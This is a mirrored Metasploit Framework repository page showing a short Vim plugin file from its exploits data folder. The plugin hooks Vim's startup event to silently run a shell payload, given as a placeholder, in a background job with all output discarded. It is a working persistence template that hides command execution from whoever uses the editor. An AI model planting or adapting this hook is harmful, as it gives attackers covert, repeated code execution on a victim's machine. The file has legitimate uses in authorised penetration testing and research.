/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
data/exploits/vim_plugin/plugin.vim
11 строк
312 B
h00die
vim plugin
07 май 2026, 21:17
07 май 2026, 21:17
a394578
Код
Авторство
О чём код?
" NAME.vim - Runs in the background on startup, discards output if !has('job') || exists('g:loaded_ZZWcUtfrDa') finish endif let g:loaded_NAME = 1 augroup NAME autocmd! autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'}) augroup END